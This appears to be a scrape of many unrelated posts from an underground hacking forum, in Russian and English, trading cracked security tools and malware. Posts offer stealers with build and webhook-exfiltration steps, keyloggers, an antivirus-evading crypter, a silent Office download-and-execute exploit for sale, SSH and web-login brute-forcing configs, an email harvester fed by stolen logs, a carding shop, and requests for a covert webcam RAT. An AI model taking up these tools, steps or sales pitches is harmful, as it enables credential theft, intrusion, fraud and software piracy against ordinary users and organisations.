1. Внутренний баланс пользователя в боте - Пополнение баланса в боте - Оплата
через баланс в боте.
2. Корзина - Добавление товаров или услуг в корзину. Создание и Оплата
заказа.
Более компактное меню админки.
QIWI ОПЛАТА - Теперь прием платежей проходит мгновенно, нет необходимости в
подвязке к CRON, и кнопках "проверить платеж".
Доработки в функции Multiple Qiwi.
Добавлен раздел "Пополнения" - где видны операции пополнения баланса юзеров.
Крч демка: Клик
Скрины админки: Клик
Spoiler: Гайд по установке
You must have at least 20 reaction(s) to view the content.
Личные от 10 симп
Оплату киви чекал, вроде работает и рил платежи моментально чекает, что
заебись. По остальным оплатам хз
По поводу рассылки. Она работает, ставим на следующий день и всё отправится в
00:00 этого дня. Костыль, а хуле делать. Также писали что не работает оплата
БТЦ, но её я не проверял.
Распизделся чёт, ссылка на скачку:
You must have at least 10 reaction(s) to view the content.
Слив еще одного чудо хакера
Hidden content for authorized users.
You must have at least 100 message(s) to view the content.
CANVAS Exploit Pack от Immunity Inc
содержит 800+ эксплоитов
You must have at least 20 reaction(s) to view the content.
You must have at least 10 reaction(s) to view the content.
![](/proxy.php?image=https%3A%2F%2Fencrypted-
tbn0.gstatic.com%2Fimages%3Fq%3Dtbn%3AANd9GcRdKXrc7Rib0F4YgyQVmRGGzw4loABfSoN7Ow%26usqp%3DCAU&hash=762566945f93764ee97b83ab3ac93525)
Видел до этого раздачи с китами и кряком , но самого софта не было . Исправим
это -
You must spend at least 300 day(s) on the forum to view the content.
You must have at least 40 message(s) to view the content.
![](/proxy.php?image=https%3A%2F%2Fencrypted-
tbn0.gstatic.com%2Fimages%3Fq%3Dtbn%3AANd9GcRuic6V9E50jP6m7pVUySPeqAQs-
AQtfc5t8g%26usqp%3DCAU&hash=c760676549c37bd620d64918ad17d4c0)
https://www.youtube.com/user/DashnineMedia
Подписывайтесь на канал Рафаэля, ставьте лайки , жмите колокольчик , сделайте
красную кропку серой . Напишите в комментах как на вашем языке будет COBALT
STRIKE . Или neo вошёл в чат. )))
p.s. Кто в комментах напишет - ЭТО БЫЛО В 0DAY ГОБНОСБОРКЕ (где ничего не работает , и даже руби с питоном нет ) , ЭТО ЕСТЬ В ПАШАГРАММЕ - тот красноглазик .
Version 13 build 13.0.210129162 for Windows, Linux and macOS – 2nd February
2021
New Features
New AcuSensor for Node.js
New Target Knowledgebase records scan data which is used to improve future
scans
New FQDN and Target filter in Grouped Vulnerabilities page
New FQDN column in Targets page
New Vulnerability Checks
New test for Unrestricted access to Prometheus Interface
New test for Unrestricted access to Prometheus Metrics
New test for Unrestricted access to Golang expvar
New test for Unrestricted access to Node.js status-monitor page
New test for Unrestricted access to HAProxy stats page
New test for Unrestricted access to Nginx stub_status page
New test for Unrestricted access to Nginx nginx-module-vts status page
New test for Unrestricted access to Traefik Dashboard
New test for Unrestricted access to Kafka monitoring
New test for Unrestricted access to Netdata Dashboard
New test for Typo3 Admin publicly accessible
New test for Typo3 sensitive files
Updated WordPress Plugin checks
Updated Drupal core checks
Updates
Simplified User Profile page
Improved handing of HTML comments
Improved processing of sites using dynamic links
Improved parsing of JavaScript for new paths
Form input type is taken into consideration when processing forms
Scanner now supports NTLM Authentication for proxy authentication
multiple DeepScan updates
Comprehensive report updated to use time zone configured for Acunetix user
Added setting in settings.xml to choose which SSL cipher to be used by the
scanner
Integrated LSR logs are now stored for troubleshooting purposes
Notify user when client certificate is required but not configured for Target
Improvements in MAC installation
PHP AcuSensor will start including Stack Trace
Multiple LSR / BLR updates
Fixes
Filter items sorted alphabetically
Fixed minor UI glitch in multi-engine registration page
Multiple fixes in SlowLoris detection
Fixed scanner crashes
Fixed CSV injection in Target Export
Fixed UI issues in Target Groups page
Fixed formatting for issues pushed to Jira
Fixed issue when installing on Centos8
You must spend at least 340 day(s) on the forum to view the content.
You must have at least 46 message(s) to view the content.
Всем привет!
Первое что нам нужно это найти слив логов и берем оттуда CookieList.txt в
котором список сайтов которые посещал холдер в данном случае здесь азор
После качаем и запускаем это, закинув в папку CookieList.txt переименовав
list.txt
git clone https://github.com/KTN1990/Email-Grabber
cd Email-Grabber
sudo python3 emailgrabberv2.py -l list.txt -t 421 list=target -t кол-во сайтов
в list.txt
Далее наши адреса сохранятся в эту же папку email__list.txt
Загружаете в тхт овер таргета и идете по своим делам
paths по дефолту, но...
Kompatybilny z Linux / macOS / Windows
Niektóre programy typu Exploit są dostępne tylko dla systemu Linux
Pełna instrukcja wraz z instrukcją
Exploitation Pack 2.51.zip - AnonFiles ](https://anonfiles.com/x8K5c280q7/Immunity_Canvas_7.26_White_Phosphorus_Exploit_Pack_1.28_D2_Exploitation_Pack_2.51_zip)
anonfiles.com
przepustka 99z1366BB89333cza @@@ # 13!
Hash Expand сортирует ваши базы!
- Многофункциональный
- Простой интерфейс
- Быстрая скорость обработки
Hidden content for authorized users.
Can anyone help me with a newer version of this software ?
You must have at least 5 reaction(s) to view the content.
Искал какой-нибудь брутфорс ssh Под Windows - не нашел. Поэтому написал сам,
может кому еще понадобится.
(Не судите строго)
Формирование комбинаций формата - 192.168.1.80:22|admin:password
Загружать IP:PORT
Брутфорс (лучше предварительно рандомизировать комбинации)
В начале лог работает быстрее в связи с наполнением потоков
Hidden content for authorized users.
Download - Ready program
download
Source - https://github.com/Jazis/ssh_brute
Hidden content for authorized users.
ZIP VT -
https://www.virustotal.com/gui/file/08964561ca05015202dae1d4c8faf8ceb7cdbb4d8c40b8284752fce45cec5ff3/detection
EXE VT (поправил)-
https://www.virustotal.com/gui/file...c3787bd6946dd44db7cfbc432044277084e/detection
Инструкция по установке: [Github](https://github.com/rebl0x3r/burpsuite-
pro-installation/) YouTube
Ссылка на скачивание BurpSuite Pro: Google
Drive
Пасс: 311138
Видеокурс по изучение BurpSuite Pro: Google
Drive
Топ 30 фишек на BurpSuite Pro: Top 30
tips
-------------------------------------------------------------------------------------------------------------
P/s: Устанавливал на Kali, работает без проблем! На Windows не проверял!
DomainSorter - программа для отсеивания ваших доменов.
Отличия от других подобных тулз:
+Вы можете загружать несколько файлов.
+Вы можете использовать свои фильтры (Просто создайте *.ini файл в папке
config со своими доменами и перезапустите программу.)
+Вы можете использовать сразу несколько фильтров просто выделив их.
+Работает с любыми размерами файлов.
+Работает с регулярками.
Spoiler: бенчмарк
Hidden content for authorized users.
Скачать | [VT](https://www.virustotal.com/#/file- analysis/NTAzNWViYWQwM2RiMGM4ZmE1MGFkNjlmMzM1ZmNiZGI6MTU0ODUwMjE3OQ==)
Всем привет!
Незнаю примет ли меня этот форум,ведь я не занимаюсь malware и
т.д
Только исследованием программ и тут будут мои разработки.
1)PokerDom NoID.
Есть такой покерный клиент и в нём запрещенно пользоваться покерным
софтом(любым).
+Там при входе,вызов WMIC.exe для сбора системной информации.
Все OpenProcess(которые возможно обойти)обойдены и никакого WMIC.exe нет.
Установка:закинуть gameclient.exe в папку с покерным клиентом и запускать
ТОЛЬКО с него.
Кстати есть клиент PokerMatch от того-же разработчика.
2)WinHex InfinityPass.
Есть такая замечательная утилита и я ей пользуюсь для удаления файлов.
Но у неё всего 3 прохода для удаления файлов!Но это врядли надежное удаление
файлов.
Вчера и сегодня я занялся решением этой проблемы(добавить Pass)
Удалось сделать бесконечное количество Pass,программа будет удалять файл до
бесконечности-пока вы не остановите её.
Вот это надежное
удаление
Установка:Закинуть WinHex.exe в папку с WinHex.
P.S В архивах можно увидеть процесс создания патчей(patch*),были созданы для
отката в случае ошибки.
**Acunetix Version 13 (build 13.0.201006145 for Windows, Linux)
Лечение Windows (хранится в папке windows):**
Лечение Linux (хранится в папке linux):
P.S. Внутри лежит архив с патчем, производит аналогичные действия (пароль местный)
Скачать:
You must have at least 10 reaction(s) to view the content.
Скачать:
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/fzpVXKbQ#1dHN1IYhc8OESIXFzs6RrNsuGrweml_bMw69JhYX31E)
mega.nz
pass: 311138
Version: 13.0.201126145(26 November 2020)
Acunetix Premium is a web application security solution for managing the
security of multiple websites, web applications, and APIs. Integration
features allow you to automate your DevOps and issue management
infrastructures.
Acunetix has a clean web interface focused on ease-of-use so you can start scanning in 5 clicks. Industry-leading scan times and unique verification technologies give you immediately actionable insights so you can act fast.
https://www.virustotal.com/gui/file...0013bdfa92f49f62977ddee3c9c8e0482be/detection
vt сrack
Сrack - сделать license readonly - заменить в progdata/acu/shared/license .
Заменить движок wvsc.exe в prfiles/acu/vesion/
кряк на linux по запросу
You must have at least 24 message(s) to view the content.
Собрана мною такая коллекция. Некоторые были проверены, некоторые физически не
было возможности. Касперский и ВТ говорит, что все чисто, но я предпочитаю
работать на виртуалке с незнакомыми файлами и вам советую, т.к ручаться не
могу за всё. Пароль будет выдан за лайк. Он довольно лёгкий и буквально у вас
перед глазами, стоит взглянуть на список папок
Кто догадался - молодец.
Кто сольёт - тот и подлец (и понижатель хайда - не надо так)
anonfiles.com
Скачать: https://cloud.mail.ru/public/2WhV/tRmWpUL3D
P.S. Неверно указана версия в название темы. По ссылке версия 13.0.201112128
Ищем рабочую версию.Очень надо.
Привет бизнесмены! Поделитесь плз Linken Sphere или Antidetect взломанным.
Пусть не последняя версия, главное работающий и без склейки.
буду очень благодарен) в гугле одни склейки
думаю, не я один ищу
Hello everyone, I wanted to share something instead of a lich. This has been leaked recently, however it has potential. This is the sin stealer he discards:
It looks like it still gets past malwarebytes and other antivirus
distributions. While this is python-based malware, which does mean you'll get
big binaries, it is arguably a decent deal for low detections. To compile your
own copy change the configuration in the sin.py file. Next, create a webhook
that will act as your server to receive user logs. Compile it with pyinstaller
or pyarmor by running 'pyinstaller sin.py --onefile`. Feel free to upload it
to virustotal and test the detection yourself.
In the meantime, there is no need to know about it. "
Hidden content for authorized users.
Ссылка на download:
Hidden content for authorized users.
](https://anonfiles.com/ddP7bcM6o3/DarkStealer_zip)
anonfiles.com
Pass:
You must have at least 1 reaction(s) to view the content.
Сегодня порылся в своих старых исходниках, собрал небольшую программку,
которая собирает пароли с компутера и сохраняет их в файл,
поддерживает:
пароли на WiFi
Chrome
Mozilla FireFox
Opera
Yandex
Amigo
Comodo
Safari
IE
Только последние версии браузеров (модули от старых выкинул).
Пока от других программ не добавлял,
Может кому-то пригодится вспомнить свой пароль.
https://mega.nz/#!N9NHRCRB!OithnAITIpdTV-7BEyxxLiWjQzSV0tKQF6nCbsAh_Tc
пароль на архив - xss.is
Hello,
Some years ago I had a program for spam Darkmailer but I lost it. Can anyone help me with this old program? I know is very old program and the chances to find it are so low .
Thanks!
Duplicate Files Remover byGuron - Софт предназначен для предварительного
удаления дубликатов файлов в папке и подпапках.
Для начала вам потребуется выбрать расширение файла к примеру txt, log, exe
или * (все файлы). Если не выбрать то txt по умолчанию.
Далее надо выбрать папку с которой удалить дубли (если не выбрать то папка с
программой).
Софт ведет подсчет хеш суммы файла игнорируя имена.
Все дубли перемещаются в папку Duplicate рядом с софтом.
Hidden content for authorized users.
Скачать | [VT](https://www.virustotal.com/#/file- analysis/YTQ4MmY5ZGVlYzZlMGU0MWE3MTRlOGI2Yzk1ZmZmMGQ6MTUzMjAxNjk2NQ==)
is it worth to buy this?
DDOS AND SCANER PROXY METEORI V0.2 BY ADIRU PYTHON
cmd: pip3 install pysocks bs4 scapy-python3
officially uploaded to https://github.com/Adiru3/Meteoriv1ddos
Author Adiru https://github.com/Adiru3
Soft OpenSources / OpenSources
Link to resources: [CLIKE]https://github.com/AikoSimidzu/PornHub.com-
Checker[/CLIKE]
Download the finished version:
[[CLIKE]https://github.com/AikoSimidzu/PornHub.com-
Checker/blob/master/Checker.rar?[/CLIKE]](https://github.com/AikoSimidzu/PornHub.com-
Checker/blob/master/Checker.rar?raw=true)
Download the alt version: [CLIKE][https://github.com/AikoSimidzu/PornHub.com-
Checker/blob/master/AltChecker.rar?](https://github.com/AikoSimidzu/PornHub.com-
Checker/blob/master/AltChecker.rar?raw=true)[/CLIKE]
VT: https://www.virustotal.com/gui/file ...
5b0b18926d42a6f0a791202cb08bf135406 /
detection
VT alt version:
https://www.virustotal.com/gui/file...d680dbe1917e9ed05e7c8afa6e34ft5als3de
Developed .
If you have any idea to improve the program or if you find a mistake, then
write to me in the cart (all contacts in the profile).
**ATTENTION!
In this section, all software is checked by moderators.
No need to write any heresy, the theme will be periodically cleaned.
Functional:**
**The software was written by me, I accept any reasonable criticism.
If you have problems with the launch of the software, then try to refresh
NetFramework 4.6
Buy PSN Account TELEGRAM : PSNHAVEN**
SQLi Dumper v10.2 [Cracked By Angeal]
Download link [CLIKE]
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/irIi1QwT#RJrWNCwQ768P9z-qs1TNYc7gPxVuLmLPI8gWa1ICWy4)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now!
mega.nz
[/CLIKE]
VT [CLIKE]15/62[/CLIKE]
Run on vm or sandbox for safety.
![](/proxy.php?image=https%3A%2F%2Fxploitwizer.com%2Fassets%2Fuploads%2Fblog%2Fblog- large-27.png&hash=3f3d203036bffa8491238249325e909f)
A cloud based Android Monitoring Tool, powered by NodeJS
Features
Installation on Heroku
Video Tutorial for Heroku Click Here
**Installation on VPS or Server
Prerequisites **
Setps of Installation [Click Here](https://xploitwizer.com/blog/27/how-to- install-xploitspy-on-vps)
Video Tutorial for VPS or Server Click Here
It's recommended to run XploitSPY behind a reverse proxy such as NGINX
Code:Copy to clipboard
https://github.com/XploitWizer/XploitSPY
Click to expand...
Привет всем , хотел бы узнать мнение форумчан в наше время какой антидетект
более актуальный под БА.
Тестил сферу,ivanovation не закатили под эти запросы.
Буду благодарен за информацию
У кого завалялся,ребятки?
File Size - 3.48mb
Link-https://anonfile.com/Hf8dF7c1od/Keylogger_PAck_2.0_rar
В архиве декомпилированые сорцы простого lock_screen под android.
В архиве smile и java код сорцов.
You must have at least 20 message(s) to view the content.
Добрый день люди добрые!
Подскажите где найти исходники стиллера Azor?
Hello all of you. Today I want to share a malware encryption tool released
by ANUBIS TEAM.
I noticed this tool ignores all antivirus tools until now.
**ANU-Encyption V2.1
New function:
--------------------------------------------------
-------------------------------------------------- -------------------------
Image tool
**-------------------------------------------------------------------------------------------------
Link check**
-------------------------------------------------------------------------------------------------
Image check
[Link download](https://mega.nz/#!rls1yAwY!cgbRrjMaLFOgrSNyv- tCzwC6bw2FeuSM2yuiQiV0FMM)
-------------------------------------------------------------------------------------------------
**NOTE:**After encryption is complete, you should not upload to Virustotal to avoid further damage.
Привет всем. Я продаю следующее:
Builder - ПЕРЕГОВОРОВ (NEGOTIABLE)
Builds - $50/each
Этот эксплойт является полностью бесшумным и загружает и запускает ваш файл с
удаленного сервера без каких-либо подсказок пользователю.
Все необходимые доказательства могут быть предоставлены с помощью общего
экрана, видео или изображений.
ENG
This exploit is fully silent and downloads & executes your file from a remote
server, with no prompts to the user.
All proof needed can be provided via screen share, videos or images.
xmpp - rqv@xmpp.jp
telegram - jwgrind
discord - Rqv#8598
Tested & Working Versions:
Microsoft Office 2007 SP3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2016 Click-to-Run (C2R) for 32-bit edition
Microsoft Office 2016 Click-to-Run (C2R) for 64-bit edition
Microsoft Office Compatibility Pack Service Pack 3
Microsoft Word 2007 SP3
Microsoft Word 2010 Service Pack 2 (32-bit editions)
Microsoft Word 2010 Service Pack 2 (64-bit editions)
Microsoft Word 2013 RT Service Pack 1
Microsoft Word 2013 Service Pack 1 (32-bit editions)
Microsoft Word 2013 Service Pack 1 (64-bit editions)
Microsoft Word 2016 (32-bit edition) Microsoft Word 2016 (64-bit edition)
Приветствую всех ударников теневого и светлого производства ))
Немного выпал из жизни, и вот, решил снова вернуться к пентестингу итд, в
связи с чем возник вопрос, какой из сканеров SQLi на данный момент показывает
наиболее стабильные результаты?
Ранее отдавал предпочтение Netsparker , но найти нормально наломанную версию
насколько помню было проблематично
Оставлю опрос, ну и буду благодарен за советы
https://www.andriller.com/
Нашёл на просторах интернета, разработчики открыли исходный код :
https://github.com/den4uk/andriller
Софт для криминалестической деятельности.
Infernal Twin - Wireless hacking - Автоматический инструмент для взлома беспроводной сети
Infernal Twin - это автоматический инструмент взлома wifi, написаный на Python, созданный чтобы помочь тестировщикам проводящих оценку безопасности беспроводной сети путем автоматизации атаки Evil Twin Attack .
“The tool was created to help the auditors and penetration testers to perform wireless security assessment in a quick manner and easing complex attack vectors.” states Khalilov M, the author.
Он автоматизирует многие распространенные атаки, которые могут быть сложными и сложными в управлении при их выполнении вручную.
Это попытка создать "1-клик" авто wifi cracker - чтото вроде Metasploit. Framework с целым рядом различных векторов атаки, объединенных в один интерфейс.
Инструмент использует работу, выполняемую другими утилитами, чтобы избежать повторного изобретения колеса, популярных инструментов безопасности, таких как aircrack-ng и SSLstrip.
Установка:
SQL:Copy to clipboard
$ sudo apt-get install apache2
$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql
$ sudo apt-get install python-scapy
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb
$ sudo apt-get install aircrack-ng
$ git clone https://github.com/entropy1337/infernal-twin.git
$ cd infernal-twin
$ python db_connect_creds.py
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root
Запуск: python InfernalWireless.py (с той дериктории где сам код)
Spoiler: Проблема подключится к ДБ?
Решение:
(Спасибо @lightos )
Решением является создание нового пользователя в базе данных и использование
этого пользователя для запуска. Выполните следующие действия:
1. Удалите dbconnect.conf файл с директории Infernalwireless
2. Запустите соедуйщую команду с вашей mysql консоли:
mysql> use mysql;
mysql> CREATE USER 'root2'@'localhost' IDENTIFIED BY 'enter the new password
here';
mysql> GRANT ALL PRIVILEGES ON \.\ TO 'root2'@'localhost' WITH GRANT
OPTION;
3. Попытайтесь запустить еще раз.
Народ шалом!
Подскажите кто как продвигает каналы в телеге ?
Нет, я не школьник который хочет подняться на х*йне типа мемасиков.
Открыл ИП , нужно набирать аудиторию, естественно ходить клеить по падикам
ссылку - глупо.
Нанимать аля "маркетологов" богов СММ не вижу смысла.
Крч может какие-то инструкции с хабра есть
PS не нашел..
You must have at least 10 reaction(s) to view the content.
Написал кейлоггер в учебных целях с отправкой данных на локальный файл или
FTP. Здесь буду вести лог разработки. Тестирование привествуется.
Как получить билд кейлоггера?
Скриптом билдера:
Отправка логов по достижению размера логов в 1кб и каждые 5 минут в файл
%LOCALAPPDATA%\keylog.txt . Билд называется build.exe.
build.py 1024 300 file "%"LOCALAPPDATA"%"\keylog.txt build.exe
Отправка логов по достижению размера логов в 1кб и каждые 5 минут в FTP на
локалхост пользователь Anon пароль Pass . Билд называется build.exe.
build.py 1024 300 ftp ftp://Anon:Pass@127.0.0.1/ build.exe
[CLIKE]
Lx_9HyaRuVxiSkX7p-M)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
[/CLIKE]
ServerReminder - напоминания про оплату серверов
[+] Добавление сервера
[+] Редактирование сервера
[+] Удаление сервера
[+] Отображение списком
[-] Просроченные сервера красным
[+] Просроченные сервера: уведомление звуком и MessageBox
[+] Напоминания
[+] Звук в напоминаниях
[+] Цикличность напоминаний
[+] от 14 до 10 дней – 1 раз в день, время напоминания 15.00
[+] от 9 до 3 дней – 2 раза в день, время напоминаний в 12.00 и в 18.00
[+] от 2 до 0 дней – 4 раза в день, время напоминаний в 9.00, в 12.00, в
15.00, в 18.00
[+] Обнуление флагов каждые 10 сек
[+] Breeze dark
Формат времени для SETUP/PAYED date - dd.MM.yyyy
Reminders about payment of servers. Contribute to lurumdare/Reminder development by creating an account on GitHub.
github.com
Нужен Cobalt Strike 4
Можно не крякнутый. Триалки как я понял не существует четвёртой. Если с
артефакт кит будет - то круто. Писать в ЛС.
Тому кто предоставит - скину свой кряк в ответ.
A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux
Первый контакт в пм!
Доброго времени!
Поделитесь рабочим nlbrute 1.2 x64
Пожалуйста, очень нуждаюсь в данном софте?
Скачал какой то из интернета, так он после активации требует ее заново даже не запустившись
Приветсвую, форумчане и задроты, нашел слив для вас чита фортнайт и делюсь
с вами.
__**
Функции чита :
Chams ESP — модельки игроков окрашиваются в определенный цвет, который выбрал автор чита и Вы видите их сквозь стены.
Aimbot — автоматическая наводка Вашего прицела на врагов, чтобы Вам легче было
их убить.
Прежде всего для использования чита, а именно его инжекта, нам понадобится
данный инжектор — Xenos Injector, поэтому скачиваем его.
После этого скачиваем архив прикрепленный ниже к теме.
1. разархивируем его
2. запускаем игру
3. запускаем Panel.exe
4. выбираем процесс fortnite.
В самой игре нажимаем insert и нас должно выскочить меню
Приятной игры!
Ссылка на чит - <https://mega.nz/#!DtoRGACQ!zysxPz-ZDlcK2yRz6HIK-
syiBU-2-FbjEusITZmweOw>
VirusTotal -
https://www.virustotal.com/gui/file...51f32baac7b2d9686468976d5830b5e01a8/detection**__
**__YouTube -
__**
Онлайн магазин поп родаже СС !!
**********.site
Нужен аккаунт форума ? Пиши :
[SUPPORT #1] : @DarkMarketSupport
[TG NEWS CHANNEL] : ********** NEWS
OpenBullet - утилита для веб брута с открытым исходным кодом. Может не только брутить. По сути, OpenBullet - это пакет утилит, позволяющих выполнять запросы к целевому веб-приложению и предлагает множество инструментов для работы с полученными результатами. Софтина может использоваться для очистки и анализа данных , автоматического пентеста , модульного тестирования с помощью selenium и многого другого.
Пример под форум xss.is:
Code:Copy to clipboard
REQUEST GET "https://xss.is/"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
PARSE "<SOURCE>" LR "xfToken\" value=\"" "\"" -> VAR "token"
#Login REQUEST POST "https://xss.is/login/login"
CONTENT "login=<USERNAME>&password=<PASSWORD>&remember=1&_xfRedirect=https%3A%2F%2Fxss.is%2F&_xfToken=<token>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
KEYCHECK
KEYCHAIN Success OR
KEY "Настройки"
KEYCHAIN Failure OR
KEY "Войти"
Полная документация по использованию , созданию конфигурации и API RuriLib тут
Для сборка нужен .NET framework (dev) 4.7.2.
Скачать:
](https://github.com/openbullet/openbullet)
The OpenBullet web testing application. Contribute to openbullet/openbullet development by creating an account on GitHub.
github.com
Где купить OmniRat 4?
Софт для YouTube на подписки и просмотры (ищу)
Советую всем указывать свой юзер агент а не использовать встроенный .
Следите за качеством своих проксей .
По поводу всех ошибок пишите в лс или в телеграмм
[CLIKE]
Скачать
[/CLIKE]
ВирусТотал
Софт написан на c# и нечем не накрыт .
Сборка SMTP чекеров.Пробуйте,тестите,проверяйте на ВТ и пр сами- я чекал одним на корпы-все ок вроде.
По поиску вроде не было,если было снесите плз.
[CLIKE]
](https://drive.google.com/open?id=1P-uHSXXd8RlK27-TBoG6XytJI3hKCzyL)
drive.google.com
[/CLIKE]
Наконец-то нашел)
Password: 91234212
[CLIKE]
](https://dropmefiles.net/GT9YAhSvPM)
dropmefiles.net - быстрый файлообменник. Обменивайтесь вашими файлами без регистрации и сторонних программ. Скачать rar,zip,exe,mp3,bin,png,jpg,gif,avi,mp4,mkv,3gp и другие форматы файлов.
dropmefiles.net
[/CLIKE]
Здравствуйте! Подскажите название программки для подмены IP адреса. MAC буду
менять руками.
Интересует совт для Windows.
Парсер диапазонов для Maxmind,старый софт но кому-то возможно будет полезен.
- Умеет сам скачать базу.
- Сохранение в txt.
- Работает под .NET 4.0.
Нужен софт для открытия портов без роутера
Hello I believe in freedom of information. I have this entire collection publicly available on my website http://vx-underground.org
As of this writing, the website is down for maintenance. However, I will share it here for the time being.
KMS Matrix - это простой активатор, который быстро активирует редакции Windows и Office.
Активирует:
- Windows: 8, 8.1, 10, Server 2008, 2008 R2, 2012, 2012 R2;
- Офис: 2010, 2013, 2016, 2019.
Особенности:
- автоактивация;
- Простой интерфейс;
- Состояние звуковой активации;
- Ключи устанавливаются только на неактивированные продукты.
OpenBullet
Steam Config | Capture: Levels - Games - Wallet
Hidden content for authorized users.
](https://anonfile.com/70tbs58fn4/steam_paid_combo_loli)
anonfile.com
Metaspoit не предлагать , ищу варианты написания для ноутбука данного ратника , на ос вин 7 - архитектура любая , интересует скрытая установка данного файла , так-же автозапуск и разумеется все в скрытом режиме , фрон и бек камеры желательно чтобы отрабатывали без индикаторы самой камеры , собственно кто такие ратники пишет и кто в состоянии помочь с ними по написанию ? Либо цену в лс.
Куплю loader на Android для банк бота
Пишите в телегу @fastfud
хаюшки! осталось у кого сие чудо может в дистрибах?
патч vmware, 6.0.2-59824 которая. xp sp2 надо было еще ставить.
буду оч благодарен!
Интересуют как адекватные паблики-полупаблики, до дорогих приватов.
Обращаться в телегграм: @symsan
Приветствую форумчане, наткнулся я на такой аналог популярной программы
(KeePass) для сохранения и генерирования паролей
KeeWeb
Данная программа с открытым исходным кодом, то-есть можно самому посмотреть
код и скомпилировать не боясь за то что ваши пароли кому-то утекут, ладно
хватит воды и переходим к самому интересному.
Так-же вы можете в онлайн режиме открывать Kdbx файлы на **
![app.keeweb.info](/proxy.php?image=https%3A%2F%2Fapp.keeweb.info%2Ficons%2Fapple- touch-icon.png&hash=218c21e169b0f7f3d165eead54015d66&return_error=1) app.keeweb.info
У программы более современный и интуитивный дизайн, при создании пароля вы
можете скачать иконку самого сайта.
При запуске у вас стоит английская локализация, вы можете её поменять в
настройках, загрузив через галерею плагинов.
Имеются и другие темы оформления для программы, очень удобный и понятный
интерфейс, поэтому я считаю это лучшей альтернативой для хранения паролей.
*
Конечно у программы есть еще много плюшек, но это вы уже сами смотрите
SpiderFoot — это инструмент с открытым исходным кодом для автоматизированной
разведки. Его цель — автоматизировать процесс сбора информации о заданной
цели.
Есть три главных сферы, где может быть полезен SpiderFoot:
Если вы тестер на проникновение, SpiderFoot автоматизирует стадию сбора
информации по цели, даст вам богатый набор данных чтобы помочь вам определить
направления деятельности для теста.
Для понимания, что ваша сеть/организация открыта на показ для внешнего мира.
Эта информация в плохих руках может представлять значительный риск.
SpiderFoot также может быть использована для сбора информации о подозрительных
вредоносных IP, которые вы могли видеть в ваших логах или получили через
каналы разведки угроз.
Особенности SpiderFoot.
Использует уйму источников: более 40 и их число продолжает расти, среди них
SHODAN, RIPE, Whois, PasteBin, Google, SANS и другие.
Создан для максимального извлечения данных: каждый кусочек данных, получаемый
модулем, может быть интересным, поскольку из него можно извлечь ценную
информацию.
Работает на Linux и Windows. Полностью открыт исходный код, следовательно вы
можете сделать ваш форк на GitHub и вообще делать что хотите с программой.
Визуализация. Встроенная визуализация, основанная на JavaScript, возможность
экспорта в GEXF/CSV для использования в других инструментах, например, в
Gephi.
Пользовательский интерфейс основанный на веб. Без громоздких команд в
командной строке и без бардака с Java. Простой в использовании, простой в
навигации. Посмотрите на скриншоты.
Высоко настраиваемый. Почти каждый модуль имеет настройки, следовательно вы
можете задать уровень навязчивости и функциональности.
Модальность. Любой значительный кусок функциональности — это модуль,
написанный на Python. Не стесняйтесь писать ваших собственный модули и
присылать их для включения в программу!
В связке с SQLite. Все ваши результаты сканирования сохраняются в локальной
SQLite базе, следовательно вы можете играться с ними как вашей душе угодно.
Одновременные сканирования. Каждое сканирование запускается в своём собственном потоке, поэтому вы можете выполнить сканирования множества целей в одно время.
И даже больше… Смотрите официальную документацию, чтобы узнать ещё больше!
В отличии от именитого конкурента Maltego, SpiderFoot полностью бесплатен и
намного более полезен, поскольку способен собрать информации больше на
несколько порядков.
Официальный сайт: http://www.spiderfoot.net/
Установка SpiderFoot.
Установка SpiderFoot в Linux.
SpiderFoot написан на Python (2.7), поэтому для его запуска на
Linux/Solaris/FreeBSD/и т.д. вам нужен установленный Python 2.7, а также
дополнительные модули lxml, netaddr, M2Crypto, CherryPy и Mako.
Установите зависимости
pip install lxml netaddr M2Crypto cherrypy mako
Другие модули, такие как MetaPDF, SOCKS и т. д. Уже включены в пакет SpiderFoot, поэтому необязательно их устанавливать отдельно.
Скачайте архив с программой http://www.spiderfoot.net/download/
Распакуйте и перейдите в каталог с программой:
~$ tar zxvf spiderfoot-X.X.X-src.tar.gz
~$ cd spiderfoot-X.X.X
~/spiderfoot-X.X.X$
Запуск программы
./sf.py
Или так
python ./sf.py
В браузере перейдите по адресу http://127.0.0.1:5001/
Некоторые сервисы требуют наличия API ключей (даются бесплатно при регистрации), об этих сервисах и о получении API ключей написано на странице документации: http://www.spiderfoot.net/documentation/
Установка SpiderFoot в Windows
Скачайте архив для Windows: http://www.spiderfoot.net/download/
Распакуйте его и запустите файл sf.exe. Открывшееся консольное окно не
закрывайте на всё время работы программы.
В браузере перейдите по адресу http://127.0.0.1:5001/
Некоторые сервисы требуют наличия API ключей (даются бесплатно при
регистрации), об этих сервисах и о получении API ключей написано на странице
документации: http://www.spiderfoot.net/documentation/
Windows x86 / x64 | Размер файла: 43 Мб
Распространяемый пакет Microsoft Visual C ++ устанавливает компоненты среды
выполнения библиотек Visual C ++, необходимые для запуска приложений,
разработанных с использованием Visual C ++, на компьютере, на котором не
установлен Visual C ++.
